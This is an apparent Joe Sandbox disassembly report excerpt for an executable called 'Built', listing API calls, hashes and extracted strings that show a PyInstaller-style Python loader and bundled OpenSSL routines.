                                                                      • Snapshot File: hcaresult_3_2_7ffdf7590000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007E133019
                                                                      • String ID: 0123456789ABCDEF0123456789abcdef$Inf$NaN$VUUU$gfff
                                                                      • API String ID: 3999650332-2941899328
                                                                      • Opcode ID: 898b692f417f6eaa78e41c31c035a1fa3eb2f045bcc52f66fbfa8f3e2b7b8737
                                                                      • Instruction ID: 9f53e3ec35cf16454999d22a580a58ed884c07988ab6a419e943d80054baacb6
                                                                      • Opcode Fuzzy Hash: 898b692f417f6eaa78e41c31c035a1fa3eb2f045bcc52f66fbfa8f3e2b7b8737
                                                                      • Instruction Fuzzy Hash: 82125A26F1CA8685E7634A35C170AFA6BB2EF55388F054331DA9E537D9DF2CE4458300
                                                                      APIs
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E4F55
                                                                        • Part of subcall function 00007FF76D5E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48BC
                                                                        • Part of subcall function 00007FF76D5D9C58: HeapFree.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
                                                                        • Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78
                                                                        • Part of subcall function 00007FF76D5D9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF76D5D9BEF,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5D9C19
                                                                        • Part of subcall function 00007FF76D5D9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF76D5D9BEF,?,?,?,?,?,00007FF76D5D9ADA), ref: 00007FF76D5D9C3E
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E4F44
                                                                        • Part of subcall function 00007FF76D5E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E491C
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51BA
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51CB
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51DC
                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF76D5E541C), ref: 00007FF76D5E5203
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                      • String ID: [oV116
                                                                      • API String ID: 4070488512-247592185
                                                                      • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                      • Instruction ID: de8003d49b5fee1363dccf334329b06382036a61e58d742a96b94429c9cbb468
                                                                      • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                      • Instruction Fuzzy Hash: 9AD18C26E2C252C6E724BF26D8511B9A7A1EF88B84FC44135EE4D47A96FF3CE441C760
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID: [oV116
                                                                      • API String ID: 1239891234-247592185
                                                                      • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                      • Instruction ID: ac4028a1de4663d90789a5a4f941f7ecf2165661c67e79deb3bba9e96551ecee
                                                                      • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                      • Instruction Fuzzy Hash: A9314F32628B81C5DB60EF25E8502AEB3A4FB88755F940139EE9D47B56EF38D145CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true
                                                                      • Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007B6570
                                                                      • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH
                                                                      • API String ID: 4069847057-3120971754
                                                                      • Opcode ID: 0bb61a38e93cd422698bbbe6ad57663e905148832b226e3a331a90a2a185b23b
                                                                      • Instruction ID: 02e567feba5351c24ed6ad6c3d3c7d54c9831fba2192bf6de55ce601cead394e
                                                                      • Opcode Fuzzy Hash: 0bb61a38e93cd422698bbbe6ad57663e905148832b226e3a331a90a2a185b23b
                                                                      • Instruction Fuzzy Hash: 02E1D87BF0C24A46E7648E159860BBA77D9FB44B84F146035EAAD436D8DB3CE449CB00
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                      • String ID: [oV116
                                                                      • API String ID: 2227656907-247592185
                                                                      • Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                      • Instruction ID: dd639588ca415a33586a40ada6433f0ff477c77c3d87df152ecc0dfd81fe59c7
                                                                      • Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                      • Instruction Fuzzy Hash: D1B1B422B2C692C1EA60BB2A95101B9E391EB58BE4FC45132ED5D47FD6EF3CE441C720
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                      • Instruction ID: 8d9d8a933923093185c47f1eb5d5062bc5fa43f7293ddd6cb9ae882ba88b93ca
                                                                      • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                      • Instruction Fuzzy Hash: EF312172618B81C5EB60AF60E8807FD7364FB48745F444039DA4D47B95EF38D548CB20
                                                                      APIs
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51BA
                                                                        • Part of subcall function 00007FF76D5E4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E491C
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51CB
                                                                        • Part of subcall function 00007FF76D5E48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48BC
                                                                      • _get_daylight.LIBCMT ref: 00007FF76D5E51DC
                                                                        • Part of subcall function 00007FF76D5E48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E48EC
                                                                        • Part of subcall function 00007FF76D5D9C58: HeapFree.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
                                                                        • Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78
                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF76D5E541C), ref: 00007FF76D5E5203
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                      • String ID: [oV116
                                                                      • API String ID: 3458911817-247592185
                                                                      • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                      • Instruction ID: aa6c6b4cae37d3970b30fe50c24a69c96ebd3c86faf7b45a272d96d7fc422627
                                                                      • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                      • Instruction Fuzzy Hash: 67514B32E2C642C6E724FF21E9915B9A761AB4C784FC44539EE4D47A97EF3CE4408B60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true
                                                                      • Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007
                                                                      • String ID: ..\s\ssl\statem\statem_srvr.c$resumption
                                                                      • API String ID: 3568877910-332775882
                                                                      • Opcode ID: 4ad2387cf5b43bbe971ed9e2d113b396eacd119982397ae11a6554e5567f7b71
                                                                      • Instruction ID: 05877cb0485bb372705ad27b384e0a0d2b1c86199cbcb19421eec3b9b274c90f
                                                                      • Opcode Fuzzy Hash: 4ad2387cf5b43bbe971ed9e2d113b396eacd119982397ae11a6554e5567f7b71
                                                                      • Instruction Fuzzy Hash: FAB15F36F08A8581FB509B66E864BE967A0EB85B88F042135DE9C8B7DDCF7CD549C700
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C50C0
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5101
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5126
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C514B
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5173
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C519B
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C51C3
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C51EB
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5213
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                      • API String ID: 190572456-2007157414
                                                                      • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                      • Instruction ID: dcd2a43fb98ae11f8d371fea8ef00dc3fa6924d50b2b81194dc738634587f8d1
                                                                      • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                      • Instruction Fuzzy Hash: 01129168D2EF03D1FA15FB44A8501B4A7A1AF48792FD4143ACC1E12AA6FF7CF5488670
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                      • API String ID: 190572456-3427451314
                                                                      • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                      • Instruction ID: 9f4e4e738d44f46ad2e55ab6ebf46b83c2bc2b25c6657284d3a78060318321bb
                                                                      • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                      • Instruction Fuzzy Hash: EFE17768D3DB03D1EA59FB14A9501B4A3A5AF8C792FD4103ACC1D06BA6FF7CB5488670
                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9
                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF76D5C7C97,?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C782C
                                                                        • Part of subcall function 00007FF76D5C26C0: MessageBoxW.USER32 ref: 00007FF76D5C2736
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$[oV116$\
                                                                      • API String ID: 1662231829-1446728369
                                                                      • Opcode ID: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
                                                                      • Instruction ID: 9408ae2ab19cebbd0c409b4ff9f69d6af695db70648c0e9d199bf38b6d6a3c21
                                                                      • Opcode Fuzzy Hash: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
                                                                      • Instruction Fuzzy Hash: D9419411E3C643C1FB60BB24D8516BAE261AF98784FC4543ADE4E42E97FE6CE1048B70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                      • API String ID: 2030045667-1550345328
                                                                      • Opcode ID: 91216cdd80ef99cbd30311021a24b424b5ca0d451c8436cbdecec9b9f388c83e
                                                                      • Instruction ID: 134f155b7ec8cdd1af335565368b3dc9593892fbddf6f13be953dd8d6c6e7f36
                                                                      • Opcode Fuzzy Hash: 91216cdd80ef99cbd30311021a24b424b5ca0d451c8436cbdecec9b9f388c83e
                                                                      • Instruction Fuzzy Hash: 6C517A61B2C643D2EA10BB25A9505B9A3A0BF48B94FC44139ED1D47F97FE3CE5548B30
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true
                                                                      • Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007B6570
                                                                      • String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192
                                                                      • API String ID: 4069847057-2661540032
                                                                      • Opcode ID: e2bbb32d1d3d283f2e394a8df4aae2e8d2f1c393b3f5a88a0770c77b7573a677
                                                                      • Instruction ID: 04b3a24a37d321d61dd44cff61dc4200a8b83de3a8240810e6e6fa63f6a8aef1
                                                                      • Opcode Fuzzy Hash: e2bbb32d1d3d283f2e394a8df4aae2e8d2f1c393b3f5a88a0770c77b7573a677
                                                                      • Instruction Fuzzy Hash: BF41807BF08A1A96EB188B10D860BF933A0FB58B84F445435DA6D836D8DF2CE568C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true
                                                                      • Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007E13301210
                                                                      • String ID: ..\s\ssl\t1_enc.c$client finished$extended master secret$key expa$master s$n$nsio$server finished
                                                                      • API String ID: 597871296-2209449699
                                                                      • Opcode ID: dfa8aec1510d3dd9a5f7309a3e3d747647d746a0efbc19ea33d4be1b9a8d2319
